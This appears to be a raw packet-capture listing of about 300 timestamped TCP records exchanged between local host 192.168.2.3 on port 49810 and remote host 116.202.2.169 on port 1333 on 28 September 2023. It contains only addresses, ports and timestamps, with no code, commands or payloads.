Sep 28, 2023 06:02:00.474806070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474838018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474868059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474883080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474927902 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474930048 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.474982977 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.474999905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475020885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475050926 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475080967 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475091934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475126028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475136995 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475177050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475667953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475712061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475719929 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475754976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475754976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475800991 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475831985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475848913 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475881100 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475912094 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475922108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.475967884 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.475970984 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476021051 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476058960 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476106882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476135015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476182938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476218939 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476237059 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476264954 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476274014 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476284981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476310015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476324081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476351976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476358891 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476403952 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476424932 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476470947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476524115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476572990 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476610899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476649046 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476663113 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476692915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476700068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476746082 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476775885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476809025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476824999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476854086 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476861954 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476906061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.476943016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476962090 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.476993084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477024078 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477063894 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477113962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477150917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477195024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477199078 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477235079 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477241993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477282047 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477305889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477360964 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477374077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477417946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477432966 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477478981 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477514982 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477565050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477600098 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477637053 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477650881 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477654934 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477680922 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477710962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477721930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477756023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477768898 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477802992 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477806091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477852106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477890015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477909088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477938890 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477942944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.477958918 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.477981091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478014946 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478060961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478099108 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478132010 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478147030 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478177071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478188992 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478234053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478264093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478308916 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478327036 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478343964 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478374004 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478404999 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478435993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478482962 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478521109 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478570938 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478609085 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478658915 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478697062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478730917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478746891 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478776932 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478784084 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478827953 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478864908 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478883028 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478913069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478944063 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.478955030 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.478988886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479001045 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479033947 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479039907 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479088068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479125023 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479173899 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479199886 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479250908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479288101 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479337931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479367018 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479413033 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479439020 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479484081 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479595900 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479614019 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479630947 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479644060 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479649067 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479670048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479670048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479701042 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479708910 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479752064 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479792118 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479837894 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479875088 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479895115 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479912043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.479929924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479929924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479962111 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.479985952 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480029106 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480061054 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480107069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480144024 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480191946 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480228901 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480276108 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480313063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480359077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480390072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480423927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480437040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480443001 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480477095 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480478048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480478048 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480514050 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480528116 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480556965 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480578899 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480597973 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480629921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480629921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480746031 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480763912 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480798006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480798006 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480827093 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480869055 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480874062 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480907917 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480917931 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480946064 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.480954885 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.480998993 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481035948 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481059074 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481091976 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481095076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481095076 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481131077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481131077 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481163979 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481200933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481214046 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481236935 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481271029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481304884 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481318951 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481323004 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481342077 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481359005 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481359959 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481393099 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481400013 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481443882 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481448889 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481482983 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481493950 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481528044 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481529951 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481563091 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481575966 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481605053 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481631041 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481651068 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481676102 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481709003 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481719017 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481762886 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481794119 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481837988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481857061 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481904984 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481934071 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481955051 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481987000 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.481988907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.481988907 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482006073 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482024908 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482104063 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482121944 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482145071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482145071 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482177973 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482183933 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482227087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482281923 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482300043 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482332945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482332945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482336044 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482371092 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482382059 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482420921 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482475996 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482495070 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482527018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482527018 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482567072 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482584953 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482613087 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482633114 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482672930 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482692957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482718945 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482724905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482738972 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482773066 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482775927 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482819080 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482834101 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482863903 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482871056 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482918978 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.482954025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.482974052 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483000040 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483005047 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483021021 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483056068 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483110905 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483129025 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483155012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483161926 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483175039 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483206987 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483242035 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483288050 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483289957 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483334064 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483345985 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483364105 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483397961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483397961 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483429909 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483464003 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483475924 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483510017 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483561993 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483609915 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483612061 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483645916 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483654976 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483689070 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483705997 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483752012 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483788967 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483824015 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483835936 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483864069 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483870029 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483889103 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.483915091 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483935118 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.483969927 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484014988 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484051943 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484071016 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484097958 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484121084 CEST	49810	1333	192.168.2.3	116.202.2.169
Sep 28, 2023 06:02:00.484129906 CEST	1333	49810	116.202.2.169	192.168.2.3
Sep 28, 2023 06:02:00.484174013 CEST	49810	1333	192.168.2.3	116.202.2.169
